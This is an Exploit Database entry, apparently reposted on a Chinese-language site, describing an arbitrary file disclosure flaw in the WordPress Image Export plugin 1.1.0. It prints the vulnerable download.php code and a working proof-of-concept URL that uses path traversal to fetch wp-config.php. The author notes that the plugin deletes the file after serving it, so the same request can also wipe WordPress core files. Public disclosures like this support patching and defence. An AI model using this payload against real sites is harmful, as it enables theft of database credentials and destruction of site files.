WordPress Plugin Image Export 1.1.0 – Arbitrary File Disclosure

• Exploit Database
• 166 阅读

• 作者： AMAR^SHG
  日期： 2016-03-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39584/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34

  # Exploit Title: WordPress image-export LFD # Date: 03/21/2016 # Exploit Author: AMAR^SHG # Vendor Homepage: http://www.1efthander.com # Software Link: http://www.1efthander.com/category/wordpress-plugins/image-export # Version: Everything is affected including latest (1.1.0 ) # Tested on: Windows/Unix on localhost   download.php file code:   <?php if ( isset( $_REQUEST[&apos;file&apos;] ) && !empty( $_REQUEST[&apos;file&apos;] ) ) { $file = $_GET[&apos;file&apos;];   header( &apos;Content-Type: application/zip&apos; ); header( &apos;Content-Disposition: attachment; filename="&apos; . $file . &apos;"&apos; ); readfile( $file ); unlink( $file ); exit; } ?>   Proof of concept:   Note that because of the unlink, we potentially can destroy the wordpress core.   Simply add the get parameter file:   localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php   Found by AMAR^SHG (Shkupi Hackers Group)